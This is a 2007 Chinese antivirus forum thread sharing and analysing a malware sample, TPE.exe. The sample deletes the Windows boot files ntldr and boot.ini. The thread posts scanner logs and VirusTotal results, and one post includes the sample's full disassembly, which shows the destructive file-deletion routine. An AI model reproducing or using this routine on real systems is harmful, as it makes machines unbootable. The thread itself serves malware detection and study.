收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 多少杀毒软件拜倒在她之下 [78a6bf] (4/32)
12下一页
返回列表 发新帖
查看: 2940|回复: 17
收起左侧

[病毒样本] 多少杀毒软件拜倒在她之下 [78a6bf] (4/32)

[复制链接]
IllusionWing
发表于 2007-10-3 18:27:42 | 显示全部楼层 |阅读模式
KillFile型病毒,删除c:\ntldr和c:\boot.ini,破坏引导

UGuard Log (Digital Fox - gankeyu@126.com)
UGuarduu.exe = 4.2.0
HC0.rlb = 2.8.9
HC2.rlb = 2.4.0
FN0.rlb = 2.3.1
扫描选项:扫描档案, 扩展, 忽略非活动, 忽略大文件, nFile, BAT模拟, 捆绑检测, 变形壳, 启发,
[扫描] [Level 2] 在 I:\systeminfo\pingce\新建文件夹\TPE.exe 检测到 Virus.KillFile.Generic
检测到了 1 个未知的恶意程序,请上报。
任务 扫描 完成。共耗费的时间:0-00-00 00:00:00:0032,共扫描的文件数量:1,共扫描到的威胁数量:1,威胁率:1


文件 TPE.rar 接收于 2007.10.03 12:19:52 (CET)
当前状态: 正在读取 ... 队列中 等待中 扫描中 完成 未发现 停止

结果: 4/32 (12.5%)

正在读取服务器信息中...
您的文件所排队列位置: 2.
预计开始时间为 43 和 62 秒之间.
扫描完成前请勿关闭窗口.
目前针对您的文件所进行的扫描进程已停止, 我们将会在稍后恢复.
如果您的等候时间超过 5 分钟, 请重新发送文件.
您的文件目前正在被 VirusTotal 扫描中,
结果将会稍后完成时生成.


格式化文本
打印结果


反病毒引擎版本最后更新扫描结果
AhnLab-V32007.10.3.02007.10.02-
AntiVir7.6.0.182007.10.02TR/Crypt.ULPM.Gen
Authentium4.93.82007.10.03-
Avast4.7.1051.02007.10.03-
AVG7.5.0.4882007.10.02-
BitDefender7.22007.10.03-
CAT-QuickHeal9.002007.10.02(Suspicious) - DNAScan
ClamAV0.91.22007.10.03-
DrWeb4.44.0.091702007.10.03-
eSafe7.0.15.02007.10.02-
eTrust-Vet31.2.51822007.10.03-
Ewido4.02007.10.02-
FileAdvisor12007.10.03-
Fortinet3.11.0.02007.10.03-
F-Prot4.3.2.482007.10.03-
F-Secure6.70.13030.02007.10.03-
IkarusT3.1.1.122007.10.03-
Kaspersky7.0.0.1252007.10.03-
McAfee51322007.10.02-
Microsoft1.28032007.10.03-
NOD32v225682007.10.03-
Norman5.80.022007.10.02-
Panda9.0.0.42007.10.03Suspicious file
Prevx1V22007.10.03-
Rising19.43.10.002007.10.02-
Sophos4.22.02007.10.03-
Sunbelt2.2.907.02007.10.03-
Symantec102007.10.03-
TheHacker6.2.6.0762007.10.03-
VBA323.12.2.42007.10.03-
VirusBuster4.3.26:92007.10.02-
Webwasher-Gateway6.0.12007.10.02Trojan.Crypt.ULPM.Gen
附加信息
File size: 603 bytes
MD5: e2e967a1386058d1363b9ef05eb04f5a
SHA1: a2f0466f56ba336aff5e0b398dc0dcee1979c621


[ 本帖最后由 gankeyu 于 2007-10-3 18:30 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

微点卫士
发表于 2007-10-3 18:48:21 | 显示全部楼层
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\TPE.EXE
是可疑程序!
试图修改关键系统文件!
是否阻止该进程继续运行?
程序:
C:\DOCUMENTS AND SETTINGS\ADMINISTRATOR\桌面\TPE.EXE
是否删除病毒程序及其衍生物?
回复

举报

The EQs
发表于 2007-10-3 18:51:41 | 显示全部楼层
没看到esafe报可疑
回复

举报

人浪流涯天
头像被屏蔽
发表于 2007-10-3 19:34:57 | 显示全部楼层
MZ@     
回复

举报

ykz1991
发表于 2007-10-3 19:35:36 | 显示全部楼层

回复 4楼 人浪流涯天 的帖子

乱码耶
回复

举报

jimmyleo
发表于 2007-10-3 19:37:28 | 显示全部楼层
……楼上两位想干嘛……
回复

举报

IllusionWing
 楼主| 发表于 2007-10-3 19:38:52 | 显示全部楼层
用ida载入就知道了....貌似直接写的汇编


.res:00401000 ; ?    Copyright (c) 2006 by DataRescue sa/nv, <ida@datarescue.com>        ?
.res:00401000 ; ?Licensed to: Paul Ashton - Blue Lane Technologies (1-user Advanced 03/2006) ?s
.res:00401000 ; 韧屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯?
.res:00401000 ;
.res:00401000 ; Input MD5   : 78A6BFC929916B123FE865DA4424BA7E
.res:00401000
.res:00401000 ; File Name   : I:\systeminfo\pingce\新建文件夹\TPE.exe
.res:00401000 ; Format      : Portable executable for 80386 (PE)
.res:00401000 ; Imagebase   : 400000
.res:00401000 ; Section 1. (virtual address 00001000)
.res:00401000 ; Virtual size                  : 00005000 (  20480.)
.res:00401000 ; Section size in file          : 00000000 (      0.)
.res:00401000 ; Offset to raw data for section: 00000400
.res:00401000 ; Flags E0000080: Bss Executable Readable Writable
.res:00401000 ; Alignment     : default
.res:00401000
.res:00401000                 .686p
.res:00401000                 .mmx
.res:00401000                 .model flat
.res:00401000
.res:00401000 ; 屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯?
.res:00401000
.res:00401000 ; Segment type: Pure code
.res:00401000 ; Segment permissions: Read/Write/Execute
.res:00401000 _res            segment para public 'CODE' use32
.res:00401000                 assume cs:_res
.res:00401000                 ;org 401000h
.res:00401000                 assume es:nothing, ss:nothing, ds:_res, fs:nothing, gs:nothing
.res:00401000                 dd 1400h dup(?)
.res:00401000 _res            ends
.res:00401000
.main:00406000 ; ---------------------------------------------------------------------------
.main:00406000 ; Section 2. (virtual address 00006000)
.main:00406000 ; Virtual size                  : 00001000 (   4096.)
.main:00406000 ; Section size in file          : 00000964 (   2404.)
.main:00406000 ; Offset to raw data for section: 00000200
.main:00406000 ; Flags E0000040: Data Executable Readable Writable
.main:00406000 ; Alignment     : default
.main:00406000 ; 屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯屯?
.main:00406000
.main:00406000 ; Segment type: Pure code
.main:00406000 ; Segment permissions: Read/Write/Execute
.main:00406000 _main           segment para public 'CODE' use32
.main:00406000                 assume cs:_main
.main:00406000                 ;org 406000h
.main:00406000                 assume es:nothing, ss:nothing, ds:_res, fs:nothing, gs:nothing
.main:00406000
.main:00406000                 public start
.main:00406000 start:
.main:00406000                 push    offset loc_406026
.main:00406005                 call    ds:LoadLibraryA
.main:0040600B                 push    offset s_Deletefilea ; "DeleteFileA"
.main:00406010                 push    eax
.main:00406011                 call    ds:GetProcAddress
.main:00406017                 mov     ds:dword_406066, eax
.main:0040601C                 jmp     short loc_40606A
.main:0040601C
.main:0040601E ; ---------------------------------------------------------------------------
.main:0040601E
.main:0040601E loc_40601E:                             ; CODE XREF: .main:004060BCj
.main:0040601E                 push    0
.main:00406020                 call    ds:ExitProcess
.main:00406020
.main:00406026
.main:00406026 loc_406026:                             ; DATA XREF: .main:starto
.main:00406026                                         ; .main:loc_40606Ao
.main:00406026                 imul    esp, [ebp+72h], 6Eh
.main:0040602A                 db      65h
.main:0040602A                 insb
.main:0040602C                 xor     esi, [edx]
.main:0040602E                 db      2Eh, 64h
.main:0040602E                 insb
.main:00406031                 insb
.main:00406031
.main:00406031 ; ---------------------------------------------------------------------------
.main:00406032                 db 0
.main:00406033 s_Deletefilea   db 'DeleteFileA',0      ; DATA XREF: .main:0040600Bo
.main:0040603F s_CBoot_ini     db 'c:\boot.ini',0      ; DATA XREF: .main:0040608Bo
.main:0040603F                                         ; .main:00406096o
.main:0040604B s_CNtldr        db 'c:\ntldr',0         ; DATA XREF: .main:004060A6o
.main:0040604B                                         ; .main:004060B1o
.main:00406054                 dd 4 dup(0)
.main:00406064                 db 2 dup(0)
.main:00406066*dword_406066    dd 0                    ; DATA XREF: .main:00406017w
.main:00406066*                                        ; .main:0040609Br
.main:00406066*                                        ; .main:004060B6r
.main:0040606A ; ---------------------------------------------------------------------------
.main:0040606A
.main:0040606A loc_40606A:                             ; CODE XREF: .main:0040601Cj
.main:0040606A                 push    offset loc_406026
.main:0040606F                 call    ds:LoadLibraryA
.main:00406075                 push    offset s_Setfileattrib ; "SetFileAttributesA"
.main:0040607A                 push    eax
.main:0040607B                 call    ds:GetProcAddress
.main:00406081                 mov     ds:dword_4060C1, eax
.main:00406086                 push    80h
.main:0040608B                 push    offset s_CBoot_ini ; "c:\\boot.ini"
.main:00406090                 call    ds:dword_4060C1
.main:00406096                 push    offset s_CBoot_ini ; "c:\\boot.ini"
.main:0040609B                 call    ds:dword_406066
.main:004060A1                 push    80h
.main:004060A6                 push    offset s_CNtldr ; "c:\\ntldr"
.main:004060AB                 call    ds:dword_4060C1
.main:004060B1                 push    offset s_CNtldr ; "c:\\ntldr"
.main:004060B6                 call    ds:dword_406066
.main:004060BC                 jmp     loc_40601E
.main:004060BC
.main:004060BC ; ---------------------------------------------------------------------------
.main:004060C1*dword_4060C1    dd 0                    ; DATA XREF: .main:00406081w
.main:004060C1*                                        ; .main:00406090r
.main:004060C1*                                        ; .main:004060ABr
.main:004060C5 s_Setfileattrib db 'SetFileAttributesA',0 ; DATA XREF: .main:00406075o
.main:004060D8                 dd 12Ch dup(0)
.main:00406588 s_DWindowsNotep db 'D:\windows\notepad.exe',0
.main:0040659F                 align 10h
.main:004065A0                 dd 0F1h dup(0)
.main:00406964                 dd 1A7h dup(?)
.main:00406964 _main           ends
.main:00406964
回复

举报

uhthn2002
发表于 2007-10-3 20:19:51 | 显示全部楼层
Uhthn Anti-Spyware V3 Alpha
Version - 3.0.0
Standard Database - 289
Paranoia Database - 6697
Heuristics Analysis - Excessive
Scan in - C:\Documents and Settings\uhthn\Desktop\TPE.exe

C:\Documents and Settings\uhthn\Desktop\TPE.exe - Infected Win32.Virus.killboot.gen

1 Files scanned
1 Infected files found
0 Suspected files found
0 Files cured
1 Files deleted
回复

举报

king6808
发表于 2007-10-3 20:58:54 | 显示全部楼层
上报
回复

举报

运指如飞
发表于 2007-10-3 22:38:37 | 显示全部楼层
Start of the scan: 2007年10月3日  22:38

Starting the file scan:

Begin scan in 'F:\TDdownload\TPE.rar'
F:\TDdownload\TPE.rar
  [0] Archive type: RAR
  --> TPE.exe
      [DETECTION] Is the Trojan horse TR/Crypt.ULPM.Gen
      [INFO]      The file was moved to '4748a9a9.qua'!
回复

举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-18 15:23 , Processed in 2.716649 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表